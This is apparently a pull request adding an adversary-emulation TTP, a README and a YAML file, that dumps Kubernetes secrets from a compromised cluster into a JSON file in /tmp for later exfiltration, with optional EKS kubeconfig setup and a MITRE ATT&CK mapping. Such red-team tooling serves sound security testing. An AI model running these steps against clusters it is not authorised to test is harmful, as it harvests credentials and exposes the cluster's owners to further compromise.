### PR TITLE
Added new TTP to extract Kubernetes secrets from compromised clusters

### DIFF
--- a/ttps/credential-access/containers/k8s/extract-k8s-secrets/README.md
+++ b/ttps/credential-access/containers/k8s/extract-k8s-secrets/README.md
@@ -1,0 +1,75 @@
+# Extract Kubernetes Secrets
+
+![Meta TTP](https://img.shields.io/badge/Meta_TTP-blue)
+
+This TTP demonstrates how to steal Kubernetes secrets from a target cluster. It
+assumes access to a compromised cluster. The TTP retrieves the secrets using the
+`kubectl get secrets` command and stores them for later exfiltration.
+
+## Arguments
+
+- **artifacts_dir**: The directory to store the retrieved secrets.
+
+  Default: /tmp
+
+- **eks_cluster**: Indicates if the target Kubernetes cluster is running on EKS.
+
+  Default: true
+
+- **target_cluster**: The name of the target Kubernetes cluster.
+
+- **target_ns**: The namespace from which secrets will be stolen.
+  If set to `NIL`, secrets will be retrieved from all namespaces.
+
+  Default: NIL
+
+- **target_region**: The region where the target cluster is located.
+
+  Default: us-east-1
+
+## Requirements
+
+1. Kubernetes cluster with access to run commands and retrieve secrets.
+1. `kubectl` installed and configured to interact with the target cluster.
+
+### EKS
+
+1. A valid set of AWS credentials. They can be provided through environment variables:
+
+   - `AWS_ACCESS_KEY_ID`
+   - `AWS_SECRET_ACCESS_KEY`
+   - `AWS_SESSION_TOKEN`
+
+     OR:
+
+   - `AWS_PROFILE`
+
+1. The AWS CLI is installed.
+1. The system should have `python3`, `pip3`, and `git` installed.
+
+## Examples
+
+You can run the TTP using the following command (adjust arguments as needed):
+
+```bash
+ttpforge run forgearmory//credential-access/containers/k8s/secrets/extract_k8s_secrets.yaml \
+    --arg target_cluster=YOUR-CLUSTER-NAME
+```
+
+## Steps
+
+1. **aws_connector**: Validates and sets up the AWS environment (if targeting an
+   EKS cluster).
+1. **setup_kubeconfig_for_eks**: Sets up kubeconfig for EKS cluster (if targeting
+   an EKS cluster).
+1. **steal-secrets**: Retrieves Kubernetes secrets from the target namespace (or
+   all namespaces if not specified) and saves them as a JSON file.
+1. **exfiltrate-secrets**: Outputs the location of the stolen secrets for later
+   exfiltration.
+
+## MITRE ATT&CK Mapping
+
+- **Tactics**:
+  - TA0006 Credential Access
+- **Techniques**:
+  - T1552 Unsecured Credentials

--- a/ttps/credential-access/containers/k8s/extract-k8s-secrets/extract-k8s-secrets.yaml
+++ b/ttps/credential-access/containers/k8s/extract-k8s-secrets/extract-k8s-secrets.yaml
@@ -1,0 +1,62 @@
+---
+api_version: 2.0
+uuid: bf324dc0-b1bd-4060-a27f-1dc883f210dc
+name: extract_k8s_secrets
+description: |
+  This TTP demonstrates how to steal Kubernetes secrets from a target cluster.
+  It assumes access to a compromised pod within the cluster. The TTP retrieves the secrets
+  using the `kubectl get secrets` command and stores them for later exfiltration.
+args:
+  - name: artifacts_dir
+    description: The directory to store the retrieved secrets.
+    default: /tmp
+  - name: eks_cluster
+    description: Target k8s cluster is running on EKS.
+    default: true
+  - name: target_cluster
+    description: The target Kubernetes cluster name.
+  - name: target_ns
+    description: Namespace from which secrets will be stolen. If not specified, secrets will be retrieved from all namespaces.
+    default: NIL
+  - name: target_region
+    description: The region where the target cluster is located.
+    default: us-east-1
+requirements:
+  platforms:
+    - os: linux
+    - os: darwin
+mitre:
+  tactics:
+    - TA0006 Credential Access
+  techniques:
+    - T1552 Unsecured Credentials
+
+steps:
+  {{ if .Args.eks_cluster }}
+  - name: aws_connector
+    description: This step invokes the setup_cloud_env action.
+    ttp: //helpers/cloud/aws/validate-aws-env-configured.yaml
+    args:
+      region: "{{ .Args.target_region }}"
+
+  - name: setup_kubeconfig_for_eks
+    description: Set up kubeconfig for EKS cluster.
+    ttp: //helpers/containers/k8s/setup-kubeconfig-for-eks.yaml
+    args:
+      cluster_name: "{{ .Args.target_cluster }}"
+      cluster_region: "{{ .Args.target_region }}"
+  {{ end }}
+
+  - name: steal-secrets
+    description: Retrieve Kubernetes secrets from the target namespace or all namespaces if none is specified, and save them as a JSON file.
+    inline: |
+      if [ -z "{{ .Args.target_ns }}" ] || [ "{{ .Args.target_ns }}" = "NIL" ]; then
+        kubectl get secrets -A -o json > {{ .Args.artifacts_dir }}/secrets.json
+      else
+        kubectl get secrets -n {{ .Args.target_ns }} -o json > {{ .Args.artifacts_dir }}/secrets.json
+      fi
+
+  - name: exfiltrate-secrets
+    description: Output the location of the stolen secrets for later exfiltration.
+    inline: |
+      echo "Secrets have been saved to {{ .Args.artifacts_dir }}/secrets.json"


### PR DESCRIPTION
Summary:
**Added:**

- Created `extract-k8s-secrets.yaml` TTP to demonstrate stealing Kubernetes secrets
- Added steps to retrieve secrets using `kubectl` and save them for exfiltration
- Included AWS EKS support for setting up kubeconfig and validating AWS environment
- Created a detailed `README.md` explaining arguments, requirements, and usage examples

Differential Revision: D61684127


